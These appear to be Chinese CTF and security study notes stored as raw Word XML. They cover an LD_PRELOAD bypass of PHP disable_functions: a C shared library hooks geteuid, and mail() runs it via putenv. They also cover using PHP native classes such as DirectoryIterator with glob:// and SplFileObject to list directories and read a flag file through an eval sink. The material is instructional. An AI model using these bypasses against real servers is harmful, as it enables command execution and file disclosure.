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28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>##########################ld_preload########################</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1、程序的链接</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>程序的链接可以分为以下三种</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    静态链接：在程序运行之前先将各个目标模块以及所需要的库函数链接成一个完整的可执行程序，之后不再拆开。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    装入时动态链接：源程序编译后所得到的一组目标模块，在装入内存时，边装入边链接。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    运行时动态链接：原程序编译后得到的目标模块，在程序执行过程中需要用到时才对它进行链接。</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动态链接库的搜索路径搜索的先后顺序</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>LD_PRELOAD &gt; LD_LIBRARY_PATH &gt; /etc/ld.so.cache &gt; /lib &gt; /usr/lib</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>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ld_preload等动态链接库记载动态库的路径</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>因此，我们可以修改ldpreload指向的动态库文件来自定义一些函数的用途</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LD_PRELOAD：mail(内嵌在php中</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>例如：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>#vim demo.php</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>mail(</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?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>//创建了一个mail函数调用的php代码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>#strace -o 1.txt -f php demo.php</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>//将demo.php执行的动作和调用程序记录在1.txt里</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>#cat 1.txt|grep execve</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="2186940" cy="16402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86940" cy="1640205"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>看到调用了sendmail指令</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>我们看看sendmail里有哪些库</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>#readelf -Ws /usr/sbin/sendmail</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>看到里面有getuid，我们可以修改getuid如下</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>#vim demo.c</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>#include&lt;stdlib.h&gt;#include&lt;stdio.h&gt;#include&lt;string.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Void payload(){</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>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echo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>恶意代码执行成功</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geteuid(){</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>unsetenv(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>LD_PRELOAD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>); payload();}//结束调用然后执行恶意代码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>接下来让上面文件被编译成.so文件，生成动态链接库文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>#gcc -shared -fPIC demo.c -o demo.so</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>接下来修改demo.php让其加载的动态库为demo.so</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:beforeLines="0" w:afterLines="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>#vim demo.php</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:beforeLines="0" w:afterLines="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:beforeLines="0" w:afterLines="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>putenv(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>LD_PRELOAD=./demo.so</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:beforeLines="0" w:afterLines="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>mail(</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r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:beforeLines="0" w:afterLines="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="thinThickThinMediumGap" w:color="auto" w:sz="18" w:space="0"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>绕过条件：能上传自己的so文件，putenv函数可以使用</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3463925" cy="168592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63925" cy="1685925"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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一，数组溢出</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:eastAsia="宋体" w:cs="Calibri Light"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:eastAsia="宋体" w:cs="Calibri Light"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>要显示flag的值,首先需要count[]不等于1,并且构造利用$a($b)进行flag文件的输出。要将count[]值不等于1,可以使其发生错误(数组溢出)，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:eastAsia="宋体" w:cs="Calibri Light"/>
          <w:color w:val="auto"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:eastAsia="宋体" w:cs="Calibri Light"/>
          <w:color w:val="auto"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://so.csdn.net/so/search?q=php%E6%95%B0%E7%BB%84&amp;spm=1001.2101.3001.7020" \t "https://blog.csdn.net/weixin_53090346/article/details/_blank" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:eastAsia="宋体" w:cs="Calibri Light"/>
          <w:color w:val="auto"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
          <w:rFonts w:hint="default" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:eastAsia="宋体" w:cs="Calibri Light"/>
          <w:color w:val="auto"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>php数组</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:eastAsia="宋体" w:cs="Calibri Light"/>
          <w:color w:val="auto"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:eastAsia="宋体" w:cs="Calibri Light"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的临界值是9223372036854775807。让c为此值便会发生错误,执行else部分。</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二，原生类与$a($b)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:eastAsia="宋体" w:cs="Calibri Light"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:eastAsia="宋体" w:cs="Calibri Light"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">Eval(echo new </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:eastAsia="宋体" w:cs="Calibri Light"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>$a($b)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:eastAsia="宋体" w:cs="Calibri Light"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:eastAsia="宋体" w:cs="Calibri Light"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>可以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:eastAsia="宋体" w:cs="Calibri Light"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>使用原生</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:eastAsia="宋体" w:cs="Calibri Light"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>类进行构造从而输出flag的值。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:eastAsia="宋体" w:cs="Calibri Light"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:eastAsia="宋体" w:cs="Calibri Light"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>什么是原生类？</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:eastAsia="宋体" w:cs="Calibri Light"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>原生类就是php内置类，不用定义php自带的类，即不需要在当前脚本写出，但也可以实例化的类</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:eastAsia="宋体" w:cs="Calibri Light"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"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1）遍历文件的原生类</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DirectoryIterator("glob://f*");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echo $a;</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以上是经常使用的DirectoryIterator类，可以配合glob伪协议遍历目录里的文件</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如果想显示所有的文件可以用foreach函数来遍历，比如</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&lt;?php</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$a = new DirectoryIterator("/");</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foreach($a as $f){</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 xml:space="preserve">    echo($f.'&lt;br&gt;');</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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"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DirectoryIterator类</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:eastAsia="宋体" w:cs="Calibri Light"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>：里面包含__tostring</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:p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当执行echo函数时</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:eastAsia="宋体" w:cs="Calibri Light"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:eastAsia="宋体" w:cs="Calibri Light"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>会触发__toString()方法，输出指定目录里面经过排序之后的第一个文件名</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:p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说人话：echo能输出文件名</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:eastAsia="宋体" w:cs="Calibri Light"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:eastAsia="宋体" w:cs="Calibri Light"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:eastAsia="宋体" w:cs="Calibri Light"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:eastAsia="宋体" w:cs="Calibri Light"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>输出文件的原生类</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>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SplFileObject</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
